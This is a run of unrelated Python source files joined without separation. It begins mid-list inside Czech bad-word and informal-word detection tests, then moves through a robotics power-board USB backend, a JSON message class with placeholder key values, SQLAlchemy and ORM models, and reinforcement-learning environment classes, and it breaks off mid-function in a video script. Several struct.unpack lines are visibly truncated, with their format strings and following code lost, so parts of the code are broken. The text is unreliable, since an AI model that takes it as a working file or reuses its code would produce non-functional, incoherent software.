"gej", "gportal", "hnusná", "hovada", "hovadina", "hoven", "hovna", "hovno", "hovnu", "howno", "idiot", "kastrováni", "keci", "kokot", "kokota", "kokote", "kokoti", "kokotina", "kravina", "kreten", "kretén", "kreteni", "kreténi", "kunda", "kundo", "kundy", "kurva", "kurvy", "kuzdasová", "magor", "mrdá", "mrdal", "mrdání", "mrdat", "mrdka", "mrdky", "nasrat", "necum", "nečum", "neser", "nesmrděli", "penis", "penisu", "péra", "péro", "pica", "pice", "pici", "pico", "picovina", "picu", "piča", "píča", "piče", "píče", "piči", "píči", "pičo", "píčo", "pičovina", "píčovina", "píčoviny", "piču", "píču", "pičus", "píčus", "polib", "polibte", "posral", "posrávání", "prd", "prdel", "prdele", "prdeli", "prdy", "sex", "sexy", "slovackatiskovakancelar", "smrad", "smrděl", "smrdi", "smrdí", "smrdis", "smrdíš", "smrdite", "smrdíte", "sracka", "sraček", "sračka", "sračky", "sraní", "svině", "šuká", "šukal", "šukání", "šukat", "teplej", "vole", "všiví", "vycucali", "vykaly", "zasranej", "zasraný", "zkurvenýho", "zmrd", "zmrde", "zmrdi" ] INFORMAL = [ "ahoj", "ahojky", "balustrada", "bla", "blablabla", "borec", "bydlí", "cau", "čau", "čus", "děkuji", "dete", "děte", "editovat", "furt", "haha", "hahaha", "hahahaha", "hodne", "jeto", "jjj", "jste", "julieta", "juliin", "kapuletů", "kolínšti", "kterej", "kurzíva", "lol", "mam", "mám", "mate", "máte", "média", "miluju", "moje", "montekové", "monteků", "mucednici", "nadpisu", "neformátovaný", "neni", "neprůstřelné", "nepřestanete", "nevim", "nuda", "odkazu", "omg", "omluvného", "patláním", "pekna", "pěkně", "pepa", "plnýho", "podžezali", "porno", "prografika", "proste", "prostě", "protoze", "přeškrtnutý", "příklad", "příspěvky", "rád", "roméo", "romerovi", "romeus", "salvadorský", "salvadorští", "sem", "smazat", "sou", "ste", "strašně", "tady", "taky", "tipynavylety", "tučný", "tybalt", "tybalta", "uklizečky", "ukradnou", "vam", "vám", "vás", "velkej", "velky", "vložit", "vložte", "vytrznik", "zdar", "znecistuje", "znečistil" ] OTHER = [ """ Rúmí se narodil v Balchu (město v tehdejší Persii, v provincii Chorásánu, nyní v severním Afghánistánu) a zemřel v Konyi (v Anatolii, tehdy Rúmský sultanát, dnes Turecko), kam se roku 1228 přestěhoval na předchozí pozvání rúmského sultána Kajkubáda I. Svou poezii psal v perštině a jeho práce jsou široce čtené v Íránu a Afghánistánu, kde se perštinou mluví. """ ] def test_badwords(): compare_extraction(czech.badwords.revision.datasources.matches, BAD, OTHER) eq_(czech.badwords, pickle.loads(pickle.dumps(czech.badwords))) def test_informals(): compare_extraction(czech.informals.revision.datasources.matches, INFORMAL, OTHER) eq_(czech.informals, pickle.loads(pickle.dumps(czech.informals))) def test_dictionary(): cache = {revision_oriented.revision.text: 'kam se roku worngly.'} eq_(solve(czech.dictionary.revision.datasources.dict_words, cache=cache), ["kam", "se", "roku"]) eq_(solve(czech.dictionary.revision.datasources.non_dict_words, cache=cache), ["worngly"]) eq_(czech.dictionary, pickle.loads(pickle.dumps(czech.dictionary))) def test_stopwords(): cache = {revision_oriented.revision.text: 'rúmského sultána odkazy'} eq_(solve(czech.stopwords.revision.datasources.stopwords, cache=cache), ['odkazy']) eq_(solve(czech.stopwords.revision.datasources.non_stopwords, cache=cache), ['rúmského', 'sultána']) eq_(czech.stopwords, pickle.loads(pickle.dumps(czech.stopwords))) """Hardware Backend for the SR V4 power board.""" import struct from datetime import timedelta from time import sleep from typing import Callable, Dict, Mapping, Set, cast import usb from j5.backends.hardware.env import NotSupportedByHardwareError from j5.backends.hardware.j5.raw_usb import ( RawUSBHardwareBackend, ReadCommand, WriteCommand, handle_usb_error, ) from j5.boards import Board from j5.boards.sr.v4.power_board import PowerBoard, PowerOutputPosition from j5.components import ( BatterySensorInterface, ButtonInterface, LEDInterface, PiezoInterface, PowerOutputInterface, ) # The names and codes of these commands match the definitions in usb.h in the firmware # source. CMD_READ_OUTPUT: Mapping[int, ReadCommand] = { output.value: ReadCommand(output.value, 4) for output in PowerOutputPosition } CMD_READ_5VRAIL = ReadCommand(6, 4) CMD_READ_BATTERY = ReadCommand(7, 8) CMD_READ_BUTTON = ReadCommand(8, 4) CMD_READ_FWVER = ReadCommand(9, 4) CMD_WRITE_OUTPUT: Mapping[int, WriteCommand] = { output.value: WriteCommand(output.value) for output in PowerOutputPosition } CMD_WRITE_RUNLED = WriteCommand(6) CMD_WRITE_ERRORLED = WriteCommand(7) CMD_WRITE_PIEZO = WriteCommand(8) class SRV4PowerBoardHardwareBackend( PowerOutputInterface, PiezoInterface, ButtonInterface, BatterySensorInterface, LEDInterface, RawUSBHardwareBackend, ): """The hardware implementation of the SR V4 power board.""" board = PowerBoard @classmethod @handle_usb_error def discover(cls, find: Callable = usb.core.find) -> Set[Board]: """Discover boards that this backend can control.""" boards: Set[Board] = set() device_list = find(idVendor=0x1bda, idProduct=0x0010, find_all=True) for device in device_list: backend = cls(device) board = PowerBoard(backend.serial, backend) boards.add(cast(Board, board)) return boards @handle_usb_error def __init__(self, usb_device: usb.core.Device) -> None: self._usb_device = usb_device self._output_states: Dict[int, bool] = { output.value: False for output in PowerOutputPosition } self._led_states: Dict[int, bool] = { i: False for i in range(2) } self.check_firmware_version_supported() def check_firmware_version_supported(self) -> None: """Raises an exception if the firmware version is not supported.""" v = self.firmware_version if v != "3": raise NotImplementedError(f"this power board is running firmware " f"version {v}, but only version 3 is supported") @property def firmware_version(self) -> str: """The firmware version reported by the board.""" version, = struct.unpack(" bool: """Get whether a power output is enabled.""" try: return self._output_states[identifier] except KeyError: raise ValueError(f"Invalid power output identifier {identifier!r}; " f"valid identifiers are {CMD_WRITE_OUTPUT.keys()}") from None def set_power_output_enabled( self, identifier: int, enabled: bool, ) -> None: """Set whether a power output is enabled.""" try: cmd = CMD_WRITE_OUTPUT[identifier] except KeyError: raise ValueError(f"Invalid power output identifier {identifier!r}; " f"valid identifiers are {CMD_WRITE_OUTPUT.keys()}") from None self._write(cmd, int(enabled)) self._output_states[identifier] = enabled def get_power_output_current(self, identifier: int) -> float: """Get the current being drawn on a power output, in amperes.""" try: cmd = CMD_READ_OUTPUT[identifier] except KeyError: raise ValueError(f"invalid power output identifier {identifier!r}; " f"valid identifiers are {CMD_READ_OUTPUT.keys()}") from None current, = struct.unpack(" None: """Queue a pitch to be played.""" if identifier != 0: raise ValueError(f"invalid piezo identifier {identifier!r}; " f"the only valid identifier is 0") duration_ms = round(duration / timedelta(milliseconds=1)) if duration_ms > 65535: raise NotSupportedByHardwareError("Maximum piezo duration is 65535ms.") frequency_int = int(round(frequency)) if frequency_int > 65535: raise NotSupportedByHardwareError("Maximum piezo frequency is 65535Hz.") data = struct.pack(" bool: """Get the state of a button.""" if identifier != 0: raise ValueError(f"invalid button identifier {identifier!r}; " f"the only valid identifier is 0") state, = struct.unpack(" None: """Halt the program until this button is pushed.""" while not self.get_button_state(identifier): sleep(0.05) def get_battery_sensor_voltage(self, identifier: int) -> float: """Get the voltage of a battery sensor.""" if identifier != 0: raise ValueError(f"invalid battery sensor identifier {identifier!r}; " f"the only valid identifier is 0") current, voltage = struct.unpack(" float: """Get the current of a battery sensor.""" if identifier != 0: raise ValueError(f"invalid battery sensor identifier {identifier!r}; " f"the only valid identifier is 0") current, voltage = struct.unpack(" bool: """Get the state of an LED.""" return self._led_states[identifier] def set_led_state(self, identifier: int, state: bool) -> None: """Set the state of an LED.""" cmds = {0: CMD_WRITE_RUNLED, 1: CMD_WRITE_ERRORLED} try: cmd = cmds[identifier] except KeyError: raise ValueError(f"invalid LED identifier {identifier!r}; valid identifiers " f"are 0 (run LED) and 1 (error LED)") from None self._write(cmd, int(state)) self._led_states[identifier] = state 1-10 """ Object to handle json message Request and Response """ import json import datetime import encryptlib.SimonCTR as ctr WHO_SENT = "ShelterInPlaceHackers" class JsonMessage(object): def __init__(self): """ Default constructor for JsonMessage class object """ self.dhke_data = { "payload": { "agreement_data": { "hash_sess_key": "", "diffie_pub_k": "" }, "signature": "" }, "sess_key": { "key": "", # 256 bits "nonce": "" # ToD } } """ Alice -> Bob dhke = { "payload": "", "sess_key"" "" } """ def set_json_payload(self): """ Function used to handle creating the json message response or request """ # Currently not passing parameters, but might need to change self.set_agreement_data() self.set_signature() self.set_sess_key() def encrypt_payload(self): """ Function to encrypt the message payload """ payload_str = json.dumps(self.dhke_data["payload"]) payload_binary_str = ctr.string_to_binary(payload_str) binary_str_encrypted = ctr.countermode_encrypt(payload_binary_str, 0, 0) self.dhke_data["payload"] = binary_str_encrypted def decrypt_payload(self): """ Function to decrypt payload message """ payload_str = json.dumps(self.dhke_data["payload"]) binary_str_decrypted = ctr.countermode_decrypt(self.dhke_data["payload"], 0, 0) self.dhke_data["payload"] = ctr.binary_to_string(binary_str_decrypted) def set_agreement_data(self): """ Function used to handle setting agreement data parameters """ self.dhke_data["payload"]["agreement_data"]["diffie_pub_k"] = 696969 self.dhke_data["payload"]["agreement_data"]["hash_sess_key"] = 696969 def set_signature(self): """ Function used to handle setting signature """ self.dhke_data["payload"]["signature"] = 696969 def set_sess_key(self): """ Function used to set sess key parameters """ self.dhke_data["sess_key"]["key"] = 696969 self.dhke_data["sess_key"]["nonce"] = 696969 def __str__(self): """ Function to return json object as string """ return json.dumps(self.dhke_data) import os from sqlalchemy import create_engine from sqlalchemy import Table, Boolean, Column, Integer, String, Text, MetaData, ForeignKey from sqlalchemy.ext.declarative import declarative_base from sqlalchemy.orm import sessionmaker, scoped_session PROJECT_DIR = os.path.abspath(os.path.dirname(__file__)) sqliteConnectionString = 'sqlite:///%s' % os.path.join(PROJECT_DIR, '..', '..', 'derp.db') engine = create_engine(sqliteConnectionString, echo=True) Base = declarative_base(bind=engine) Session = scoped_session(sessionmaker(engine)) class Derp(Base): __tablename__ = 'derp' id = Column(Integer, primary_key=True) key = Column(String(80), index=True, unique=True) value = Column(String(256), unique=False) def __repr__(self): return '' % (self.key, self.value) Base.metadata.create_all() import copy import os import time from collections.abc import Iterable from . import ctx from .dbmodels import EnvSpecModel from .remote_env import (RemoteMultiAgentEnvClient, RemoteSingleAgentEnvClient) from .session import DataSession, RLSession from .util_funcs import merged_dict from .utils.env_helpers import get_wrapped_env_instance from .utils.pyson import pyson from .common import MAEnv from .env_base import DataEnvironment from .meta import * from .session_config import DataSessionConfig, RLSessionConfig from .task import Task class IterableMonitor: def __init__(self, name, iterable: Iterable): self.name = name self.iterable: Iterable = iterable self.epoch_id = None self.total_batches = 0 self.batch_id = 0 self.last_inputs = None self.last_targets = None def __iter__(self): if self.epoch_id is None: self.epoch_id = 0 self.epoch_id += 1 self.batch_id = 0 self.last_inputs = None self.last_targets = None self.iter = self.iterable.__iter__() self.next = self.__next__ return self def __next__(self): self.last_inputs, self.last_targets = self.iter.__next__() self.total_batches += 1 self.batch_id += 1 return self.last_inputs, self.last_targets class DataSessionEnv: def __init__(self, task_id=None, agent_id=None, agent_run_config=None, env_spec_id=None, env_kwargs={}, run_meta={}, config: DataSessionConfig = None): self.metadata = {} # TODO: just place holder, should put something here (required in stable baselines "dummy_vec_env.py") self.task_id = task_id self.agent_id = agent_id self.env_spec_id = env_spec_id self.agent_id = agent_id self.agent_run_config = agent_run_config self.run_meta = run_meta env_spec_model = self.get_spec_env_dbmodel() default_env_kwargs = env_spec_model.config.get('env_kwargs', {}) self.env_kwargs = pyson(merged_dict(default_env_kwargs, env_kwargs)) env_entry_point = env_spec_model.entry_point self.config = config or DataSessionConfig() self.flush_interval_secs = 1.0 self.last_summary_flush = 0 self._logger = None wrappers = self.config.wrappers + env_spec_model.config['default_wrappers'] self.env: DataEnvironment = get_wrapped_env_instance( entry_point=env_entry_point, kwargs=self.env_kwargs, wrappers=wrappers) self.session = DataSession( task_id=task_id, agent_id=agent_id, agent_run_config=agent_run_config, env_spec_id=env_spec_id) self.data_iterable = IterableMonitor( 'data', self.env.get_data_loader()) self.eval_iterable = IterableMonitor( 'eval', self.env.get_eval_loader()) self.eval_running_results = [] def get_data_loader(self): return self.data_iterable def get_eval_loader(self): self.eval_running_results = [] return self.eval_iterable def log_metrics(self, **metrics): epoch_id = self.data_iterable.epoch_id batch_id = self.data_iterable.batch_id total_batches = self.data_iterable.total_batches metrics['timestamp'] = time.time() metrics['epoch_id'] = epoch_id metrics['batch_id'] = batch_id metrics['total_batches'] = total_batches return self.session.log_data_metrics(metrics) #TODO: mucho code overlap with above def log_evaluation_metrics(self, **metrics): epoch_id = self.data_iterable.epoch_id batch_id = self.data_iterable.batch_id total_batches = self.data_iterable.total_batches metrics['timestamp'] = time.time() metrics['epoch_id'] = epoch_id metrics['batch_id'] = batch_id metrics['total_batches'] = total_batches self.session.log_evaluation_metrics(metrics) return metrics # API for prediction only output def submit_predictions(self, name, outputs, predictions, **metrics): inputs = self.data_iterable.last_inputs metrics = self.log_metrics(**metrics) self.session.log_predictions(name, inputs, outputs, predictions, metrics) self.env.submit_predictions(outputs, predictions) def get_logger(self): if self._logger is None: self._logger = ctx.get_entity_logger(TASK_ENTITY, self.task_id) return self._logger def get_sess_config(self) -> DataSessionConfig: return self.config def get_spec_env_dbmodel(self) -> EnvSpecModel: return ctx.get_dbsession().query(EnvSpecModel).get(self.env_spec_id) def get_task(self) -> Task: return Task.load(self.task_id) def close(self): self.session.close() self.env.close() def evaluate(self, expected, predictions): return self.env.evaluate(expected, predictions) def is_complete(self): # TODO: support termination criteria return False class BatchedEnv: def __init__(self, env_entry_point, env_kwargs, batch_size=1, wrappers=[]): self.env_entry_point = env_entry_point self.env_kwargs = env_kwargs self.batch_size = batch_size self.num_players = batch_size self.wrappers = wrappers self.max_num_players = batch_size self.players = [f"player_{i}" for i in range(self.num_players)] self.possible_players = self.players self.envs = {} self.observation_spaces = {} self.action_spaces = {} for k in self.players: ctx.get_logger().info(f"Loading env: {self.env_entry_point}, with {self.env_kwargs}") env = get_wrapped_env_instance(self.env_entry_point, self.env_kwargs, wrappers) self.observation_spaces[k] = env.observation_space self.action_spaces[k] = env.action_space self.envs[k] = env self.awaiting_reset = [k for k in self.players] self.enable_auto_reset = False def reset(self): # Forced reset obs = {} for k, env in self.envs.items(): obs[k] = env.reset() self.awaiting_reset = [] return obs def auto_reset(self): obs = {} for k in self.awaiting_reset: obs[k] = self.envs[k].reset() self.awaiting_reset = [] return obs def step(self, action_dict): rews, dones, infos = {}, {}, {} # Auto reset if enabled if self.enable_auto_reset and len(self.awaiting_reset) > 0: obs = self.auto_reset() for k in obs.keys(): rews[k] = None dones[k] = False infos[k] = {'start': True} else: obs = {} # Take steps for all actions provided for k, action in action_dict.items(): ob, rew, done, info = self.envs[k].step(action) if done: # Used for auto reset self.awaiting_reset.append(k) obs[k] = ob rews[k] = rew dones[k] = done infos[k] = info # Set __all__ done key if len(dones) == self.num_players: dones["__all__"] = all(dones.values()) return obs, rews, dones, infos def render(self, player_id, *args, **kwargs): return self.envs[player_id].render(*args, **kwargs) def close(self): for env in self.envs.values(): env.close() class RLSessionEnvBase: def __init__(self, task_id=None, agent_id=None, env_spec_id=None, env_kwargs={}, config: RLSessionConfig = None): self.metadata = {} # TODO: just place holder, should put something here (required in stable baselines "dummy_vec_env.py") self.task_id = task_id self.agent_id = agent_id self.env_spec_id = env_spec_id env_spec_model = self.get_spec_env_dbmodel() self.env_entry_point = env_spec_model.entry_point self.env_type = env_spec_model.env_type self.env_config = copy.deepcopy(env_spec_model.config) self.env_kwargs = self.env_config['env_kwargs'] self.env_kwargs.update(env_kwargs) self.config = config or RLSessionConfig() self.flush_interval_secs = 1.0 self.last_summary_flush = 0 self._logger = None def get_logger(self): if self._logger is None: self._logger = ctx.get_entity_logger(TASK_ENTITY, self.task_id) return self._logger def get_sess_config(self) -> RLSessionConfig: return self.config def get_spec_env_dbmodel(self) -> EnvSpecModel: return ctx.get_dbsession().query(EnvSpecModel).get(self.env_spec_id) def get_task(self) -> Task: return Task.load(self.task_id) class RLMultiSessionEnv(RLSessionEnvBase): """ TODO: This class serves too many purposes and the logic gets complicated. Consider switching to Factory for building objects that share an interface TODO: Consider adding Non-Logging Remote Session for consistancy TODO: FIX limitation by introducing batched multiplayer interface Options: NonBatched/Batched, Single/Multiplayer """ def __init__( self, agent_id=None, agent_run_config={}, use_remote_client=False, auto_reset=False, batch_size=1, run_meta={}, child_session_configs={}, timeout_abort_check_callback=lambda: False, *args, **kwargs): super().__init__(*args, **kwargs) self.agent_id = agent_id self.agent_run_config = agent_run_config self.use_remote_client = use_remote_client self.run_meta = run_meta self.batch_size = batch_size self.child_session_configs = child_session_configs os.environ['SDL_VIDEODRIVER'] = 'dummy' os.environ['SDL_AUDIODRIVER'] = "" self.is_multiplayer = self.env_type == RL_MULTIPLAYER_ENV if self.is_multiplayer and self.batch_size > 1: raise Exception("batchsize must be '1' for multiagent environments") self.player_list = None self.task = self.get_task() # Only local sessions have a primary session self.session = None self.parent_session_id = None # Configure Environemnt (make sure to assign self.player_list) if self.use_remote_client: # Remote Env self.get_logger().info("Is RemoteMultiAgentClient with {}".format(self.env_kwargs)) #TODO: Don't put this stuff in env_kwargs self.env = RemoteMultiAgentEnvClient( agent_id=agent_id, timeout_abort_check_callback=timeout_abort_check_callback, task_id = self.env_kwargs['task_id'], session_id = self.env_kwargs['session_id'], observation_spaces = pyson(self.env_kwargs['observation_spaces']), action_spaces = pyson(self.env_kwargs['action_spaces'])) # **self.env_kwargs) self.parent_session_id = self.env_kwargs['session_id'] self.player_list = self.env.players elif self.is_multiplayer: # Local Env and Multi Agent self.get_logger().info("Is Local Multi Agent") wrappers = self.config.wrappers + self.env_config['default_wrappers'] self.env: MAEnv = get_wrapped_env_instance( entry_point=self.env_entry_point, kwargs=self.env_kwargs, wrappers=wrappers) self.env.reset() self.player_list = self.env.players self.session = RLSession( config=self.config, task_id=self.task_id, agent_id=self.agent_id, agent_run_config=self.agent_run_config, env_spec_id=self.env_spec_id, session_type=RL_MULTIPLAYER_SINGLEAGENT_SESS, run_meta=run_meta, render_fn=lambda mode: self.env.render(mode=mode), persists_at_creation=True) self.parent_session_id = self.session.get_id() self.task.set_primary_session_by_id(self.parent_session_id) else: # Local Env and Batched self.get_logger().info(f"Is Batched Single Agent Env batch_size = {self.batch_size}") wrappers = self.config.wrappers + self.env_config['default_wrappers'] self.get_logger().info(f"Wrappers {wrappers}") self.env = BatchedEnv( env_entry_point=self.env_entry_point, env_kwargs=self.env_kwargs, batch_size=self.batch_size, wrappers=wrappers) self.player_list = self.env.players if self.batch_size > 1: self.session = RLSession( config=self.config, task_id=self.task_id, agent_id=self.agent_id, agent_run_config=self.agent_run_config, env_spec_id=self.env_spec_id, session_type=RL_SINGLEPLAYER_BATCHED_SESS, run_meta=run_meta, render_fn=None, persists_at_creation=True) self.parent_session_id = self.session.get_id() self.task.set_primary_session_by_id(self.parent_session_id) self.players = self.env.players self.num_players = self.env.num_players self.get_logger().info("Players {}".format(self.player_list)) self.observation_spaces = self.env.observation_spaces self.action_spaces = self.env.action_spaces self.get_logger().info(f"Obs Spaces {self.observation_spaces}") self.reset_all = True self.auto_reset = auto_reset self.child_sessions: Dict[str, RLSession] = {} for player_id in self.player_list: self.new_child_session(player_id) self.done_players = set() self.valid_action_dict = {} def get_child_summary_list(self): return {s.get_id(): s.get_summary() for s in self.child_sessions.values()} def get_child_session_player_ids(self): return {s.get_id(): player_id for player_id, s in self.child_sessions.items()} def new_child_session(self, player_id): env_run_meta = { 'players': [player_id], 'observation_spaces': {player_id: self.env.observation_spaces[player_id]}, 'action_spaces': {player_id: self.env.action_spaces[player_id]} } render_fn = lambda *args, **kwargs: self.env.render(player_id=player_id, *args, **kwargs) if player_id in self.child_session_configs: sess_config = RLSessionConfig(**self.child_session_configs[player_id]) else: sess_config = copy.copy(self.get_sess_config()) # Child sessions do not terminate on their own. Make sure session_configuration reflects this. if self.session: sess_config.max_episodes = 0 sess_config.max_steps = 0 sess_config.max_steps_in_episode = 0 session = RLSession( config=sess_config, task_id=self.task_id, agent_id=self.agent_id, parent_session_id=self.parent_session_id, agent_run_config=self.agent_run_config, env_spec_id=self.env_spec_id, env_run_meta=env_run_meta, render_fn=render_fn, session_type=RL_SINGLEPLAYER_SESS, persists_at_creation=True) if self.parent_session_id is None: self.task.set_primary_session_by_id(session.get_id()) self.child_sessions[player_id] = session def reset(self): for k, session in self.child_sessions.items(): session.before_reset() if self.session: self.session.before_reset() obs = self.env.reset() if self.session: self.session.after_reset(obs) for k, ob in obs.items(): self.child_sessions[k].after_reset(ob) self.done_players = set() self.reset_all = False return obs def step(self, action_dict) -> Tuple[Dict[str,Any],Dict[str,Any],Dict[str,Any],Dict[str,Any]]: if self.auto_reset and self.reset_all: obs = self.reset() rews, dones, infos = {}, {}, {} for k, ob in obs.items(): rews[k] = None dones[k] = False infos[k] = {'start': True} else: self.valid_action_dict = {} for player_id, action in action_dict.items(): if player_id not in self.done_players: self.valid_action_dict[player_id] = action self.child_sessions[player_id].before_step(action) else: self.get_logger().debug("Warning: agent id {} is complete. Action is invalid and will not be used".format(player_id)) if self.session: self.session.before_step(self.valid_action_dict) obs, rews, dones, infos = self.env.step(self.valid_action_dict) if self.session: self.session.after_step(obs, rews, dones, infos, self.valid_action_dict) for player_id in obs.keys(): action = self.valid_action_dict.get(player_id) self.child_sessions[player_id].after_step( obs[player_id], rews[player_id], dones[player_id], infos[player_id], action) for player_id, done in dones.items(): if done: self.done_players.add(player_id) if len(self.done_players) == len(self.child_sessions): dones['__all__'] = True # Check session limits, if reached - mark all as done if self.is_complete(): dones = {player_id: True for player_id, v in dones.items()} dones["__all__"] = True # If done, reset on next step dones["__all__"] = dones.get("__all__", False) if dones["__all__"]: self.reset_all = True # save session stats cur_time = time.time() if self.reset_all or (((cur_time - self.last_summary_flush) > self.flush_interval_secs)): for session in self.child_sessions.values(): session.save_summary() if self.session: self.session.save_summary() self.last_summary_flush = cur_time return obs, rews, dones, infos def is_complete(self): if self.session: return self.session.is_complete() else: # TODO, remote session? False def render(self, *args, **kwargs): return self.env(*args, **kwargs) def close(self): self.env.close() close_state = STATE_TERMINATED if self.session: close_state = self.session.close() for session in self.child_sessions.values(): session.close(state=close_state) class RLSingleSessionEnv(RLSessionEnvBase): """ TODO: NOT CURRENTLY WORKING """ def __init__( self, agent_id=None, agent_run_config={}, use_remote_client=False, run_meta={}, timeout_abort_check_callback=lambda: False, *args, **kwargs): super().__init__(*args, **kwargs) self.agent_id = agent_id self.agent_run_config = agent_run_config self.use_remote_client = use_remote_client self.run_meta = run_meta env_spec_model = self.get_spec_env_dbmodel() env_entry_point = env_spec_model.entry_point self.player_id = None parent_session_id = None if self.use_remote_client: # Remote Env self.get_logger().info("Is RemoteMultiAgentClient with {}".format(self.env_kwargs)) self.env = RemoteSingleAgentEnvClient( agent_id=agent_id, timeout_abort_check_callback=timeout_abort_check_callback, **self.env_kwargs) parent_session_id = self.env_kwargs['session_id'] else: # Local Env assert(env_spec_model.env_type == RL_SINGLEPLAYER_ENV), "Cannot use RLSingleSessionEnv with Local Mode MultiPlayer Environments" self.get_logger().info("Is Local Single Agent Env") wrappers = self.config.wrappers + env_spec_model.config['default_wrappers'] self.env = get_wrapped_env_instance( entry_point=env_entry_point, kwargs=self.env_kwargs, wrappers=wrappers) self.env.reset() self.session = RLSession( config=self.config, task_id=self.task_id, agent_id=self.agent_id, agent_run_config=self.agent_run_config, parent_session_id=parent_session_id, env_spec_id=self.env_spec_id, session_type=RL_SINGLEPLAYER_SESS, run_meta=run_meta, render_fn=lambda mode: self.env.render(mode=mode)) primary_session_id = parent_session_id or self.session.get_id() self.task = self.get_task() self.task.set_primary_session_by_id(primary_session_id) self.observation_space = self.env.observation_space self.action_space = self.env.action_space def reset(self): self.session.before_reset() ob = self.env.reset() self.session.after_reset(ob) return ob def step(self, action): self.session.before_step(action) ob, rew, done, info = self.env.step(action) self.session.after_step(ob, rew, done, info, action) # save session stats cur_time = time.time() if done or (((cur_time - self.last_summary_flush) > self.flush_interval_secs)): if self.session: self.session.save_summary() self.last_summary_flush = cur_time return ob, rew, done, info def is_complete(self): return self.session.is_complete() def close(self): self.env.close() self.session.close() from SBaaS_base.postgresql_orm_base import * class data_stage01_quantification_physiologicalRatios_replicates(Base): __tablename__ = 'data_stage01_quantification_physiologicalRatios_replicates' id = Column(Integer, Sequence('data_stage01_quantification_physiologicalRatios_replicates_id_seq'), primary_key=True) experiment_id = Column(String(50)) sample_name_short = Column(String(100)) #sample_name_abbreviation = Column(String(100)) #add in at some-point time_point = Column(String(10)) physiologicalratio_id = Column(String(50)) physiologicalratio_name = Column(String(100)) physiologicalratio_value = Column(Float) physiologicalratio_description = Column(String(500)) used_ = Column(Boolean); comment_ = Column(Text); __table_args__ = (UniqueConstraint('experiment_id','sample_name_short','time_point','physiologicalratio_id'), ) def __init__(self, row_dict_I, ): self.time_point=row_dict_I['time_point']; self.physiologicalratio_name=row_dict_I['physiologicalratio_name']; self.physiologicalratio_value=row_dict_I['physiologicalratio_value']; self.physiologicalratio_description=row_dict_I['physiologicalratio_description']; self.used_=row_dict_I['used_']; self.comment_=row_dict_I['comment_']; self.id=row_dict_I['id']; self.experiment_id=row_dict_I['experiment_id']; self.sample_name_short=row_dict_I['sample_name_short']; self.physiologicalratio_id=row_dict_I['physiologicalratio_id']; def __set__row__(self, experiment_id_I, sample_name_short_I, #sample_name_abbreviation_I, time_point_I, #time_point_units_I, physiologicalratio_id_I, physiologicalratio_name_I, physiologicalratio_value_I, physiologicalratio_description_I, used__I, comment__I): self.experiment_id=experiment_id_I self.sample_name_short=sample_name_short_I #self.sample_name_abbreviation = sample_name_abbreviation_I; self.time_point=time_point_I self.physiologicalratio_id=physiologicalratio_id_I self.physiologicalratio_name=physiologicalratio_name_I self.physiologicalratio_value=physiologicalratio_value_I self.physiologicalratio_description=physiologicalratio_description_I self.used_=used__I self.comment_=comment__I def __repr__(self): return "data_stage01_quantification_physiologicalRatios_replicates: %s, %s, %s" % (self.experiment_id, self.sample_name_short, self.physiologicalratio_id) def __repr__dict__(self): return {'id':self.id, 'experiment_id':self.experiment_id, 'sample_name_short':self.sample_name_short, #'sample_name_abbreviation':self.sample_name_abbreviation, 'time_point':self.time_point, 'physiologicalratio_id':self.physiologicalratio_id, 'physiologicalratio_name':self.physiologicalratio_name, 'physiologicalratio_value':self.physiologicalratio_value, 'physiologicalratio_description':self.physiologicalratio_description, 'used_':self.used_, 'comment_':self.comment_} def __repr__json__(self): return json.dumps(self.__repr__dict__()) class data_stage01_quantification_physiologicalRatios_averages(Base): __tablename__ = 'data_stage01_quantification_physiologicalRatios_averages' id = Column(Integer, Sequence('data_stage01_quantification_physiologicalRatios_averages_id_seq'), primary_key=True) experiment_id = Column(String(50)) sample_name_abbreviation = Column(String(100)) time_point = Column(String(10)) physiologicalratio_id = Column(String(50)) physiologicalratio_name = Column(String(100)) physiologicalratio_value_ave = Column(Float) physiologicalratio_value_cv = Column(Float) physiologicalratio_value_lb = Column(Float) physiologicalratio_value_ub = Column(Float) physiologicalratio_description = Column(String(500)) used_ = Column(Boolean); comment_ = Column(Text); __table_args__ = (UniqueConstraint('experiment_id','sample_name_abbreviation','time_point','physiologicalratio_id'), ) def __init__(self, row_dict_I, ): self.physiologicalratio_name=row_dict_I['physiologicalratio_name']; self.physiologicalratio_value_ave=row_dict_I['physiologicalratio_value_ave']; self.physiologicalratio_value_cv=row_dict_I['physiologicalratio_value_cv']; self.comment_=row_dict_I['comment_']; self.physiologicalratio_description=row_dict_I['physiologicalratio_description']; self.used_=row_dict_I['used_']; self.physiologicalratio_value_ub=row_dict_I['physiologicalratio_value_ub']; self.id=row_dict_I['id']; self.physiologicalratio_value_lb=row_dict_I['physiologicalratio_value_lb']; self.experiment_id=row_dict_I['experiment_id']; self.sample_name_abbreviation=row_dict_I['sample_name_abbreviation']; self.time_point=row_dict_I['time_point']; self.physiologicalratio_id=row_dict_I['physiologicalratio_id']; def __set__row__(self,experiment_id_I, sample_name_abbreviation_I, time_point_I, physiologicalratio_id_I, physiologicalratio_name_I, physiologicalratio_value_ave_I, physiologicalratio_value_cv_I, physiologicalratio_value_lb_I, physiologicalratio_value_ub_I, physiologicalratio_description_I, used__I, comment__I): self.experiment_id=experiment_id_I self.sample_name_abbreviation=sample_name_abbreviation_I self.time_point=time_point_I self.physiologicalratio_id=physiologicalratio_id_I self.physiologicalratio_name=physiologicalratio_name_I self.physiologicalratio_value_ave=physiologicalratio_value_ave_I self.physiologicalratio_value_cv=physiologicalratio_value_cv_I self.physiologicalratio_value_lb=physiologicalratio_value_lb_I self.physiologicalratio_value_ub=physiologicalratio_value_ub_I self.physiologicalratio_description=physiologicalratio_description_I self.used_=used__I self.comment_=comment__I def __repr__(self): return "data_stage01_quantification_physiologicalRatios_averages: %s, %s, %s" % (self.experiment_id, self.sample_name_abbreviation, self.physiologicalratio_id) def __repr__dict__(self): return {'id':self.id, 'experiment_id':self.experiment_id, 'sample_name_abbreviation':self.sample_name_abbreviation, 'time_point':self.time_point, 'physiologicalratio_id':self.physiologicalratio_id, 'physiologicalratio_name':self.physiologicalratio_name, 'physiologicalratio_value_ave':self.physiologicalratio_value_ave, 'physiologicalratio_value_cv':self.physiologicalratio_value_cv, 'physiologicalratio_value_lb':self.physiologicalratio_value_lb, 'physiologicalratio_value_ub':self.physiologicalratio_value_ub, 'physiologicalratio_description':self.physiologicalratio_description, 'used_':self.used_, 'comment_':self.comment_} def __repr__json__(self): return json.dumps(self.__repr__dict__())computer_network/decode/Video2Picture/Video2Pic.py import cv2 from cv2 import VideoWriter, VideoWriter_fourcc, imread, resize import os from PIL import Image from encode1 import QR_code import sys img_root = os.getcwd() # 获取当前路径 def 